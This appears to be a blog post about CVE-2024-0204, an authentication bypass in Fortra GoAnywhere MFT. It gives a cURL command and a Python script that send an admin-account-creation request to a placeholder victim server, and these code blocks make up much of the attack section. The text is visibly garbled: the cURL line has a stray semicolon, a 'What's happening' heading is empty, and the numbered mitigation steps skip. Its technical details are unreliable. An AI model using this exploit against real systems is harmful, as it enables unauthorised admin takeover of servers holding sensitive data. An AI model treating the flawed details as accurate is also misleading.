In January 2024, security researchers uncovered a critical vulnerability—CVE-2024-0204—impacting Fortra’s GoAnywhere Managed File Transfer (MFT) software (all versions before 7.4.1). This flaw lets any unauthenticated attacker create a brand new admin user simply by sending the right request to the administration portal. In this post, we’ll explore what happened, how the exploit works (with code examples), and what organizations must do to stay safe.
What is Fortra GoAnywhere MFT?
Fortra’s GoAnywhere MFT is a secure file transfer solution used by organizations globally for sending, storing, and automating movement of sensitive data. It's popular in finance, healthcare, government, and many more sectors.
What is CVE-2024-0204?
This vulnerability is a classic authentication bypass. Normally, you need valid admin credentials to add users or change critical settings. But, due to this bug, the application lets anyone create an admin account without logging in—simply by sending a specially crafted HTTP request to a specific portal endpoint.
Status:
Fixed in: v7.4.1 (released January 22, 2024)
CVE Link:
- NVD - CVE-2024-0204
1. The Setup
GoAnywhere’s admin portal includes an endpoint—for example, /goanywhere/admin/UserServlet—to manage users. Because of missing authentication steps, you can POST data to it and create an admin user, even if you’re not already an admin!
2. The Attack
Step 1:
Send an HTTP POST request to the UserServlet endpoint with the required parameters for a new admin user.
Step 2:
Log in using your new credentials and you have full admin access.
Here’s a simplified cURL command that demonstrates the exploit
curl -k -X POST 'https://victim.example.com/goanywhere/admin/UserServlet'; \
-d 'action=createUser' \
-d 'username=eviladmin' \
-d 'password=StrngP@ssword!' \
-d 'passwordConfirm=StrngP@ssword!' \
-d 'admin=true'
What’s happening:
Here’s a quick Python PoC using requests
import requests
url = "https://victim.example.com/goanywhere/admin/UserServlet";
data = {
"action": "createUser",
"username": "eviladmin",
"password": "StrngP@ssword!",
"passwordConfirm": "StrngP@ssword!",
"admin": "true"
}
resp = requests.post(url, data=data, verify=False)
print(f"Status: {resp.status_code}")
print(resp.text)
Real World Impact
This is a game-over level flaw. Anyone with network access to the admin portal (often just HTTP/HTTPS) can:
Plant backdoors, steal data, or disrupt services.
Ransomware groups and other threat actors have targeted GoAnywhere before (see BleepingComputer coverage), and this kind of bug is a goldmine for criminals.
Who Discovered It?
- The vulnerability was publicly posted on the GoAnywhere security advisories page and coordinated with security researchers.
- Proof of concept code and technical writeups quickly followed after disclosure (Horizon3.ai blog).
Check logs. Look for suspicious user creation events especially around your admin portal.
3. Restrict admin portal access. Consider network segmentation or firewalls to make sure only trusted people can reach your admin login.
Reset passwords for existing users, especially after compromise.
Official Fortra Advisory:
- https://community.fortra.com/knowledge-base/goanywhere-mft/securing-goanywhere-cve-2024-0204/
Further Reading & References
- NVD CVE-2024-0204
- Fortra Security Bulletin
- Horizon3.ai Analysis & PoC
- BleepingComputer report
In Summary
CVE-2024-0204 is one of the most severe bugs seen in file transfer products in 2024. If you use GoAnywhere MFT, check your version today. Attackers only need a single request to turn themselves into an all-powerful admin. Protect your data, patch now, and lock down your admin portal!
Stay safe out there!
Credits: This writeup is based on official advisories, security research, and reverse engineering by the infosec community. For exclusive, step-by-step coverage, follow trusted cybersecurity blogs and advisories.
Timeline
Published on: 01/22/2024 18:15:20 UTC
Last modified on: 02/02/2024 17:15:11 UTC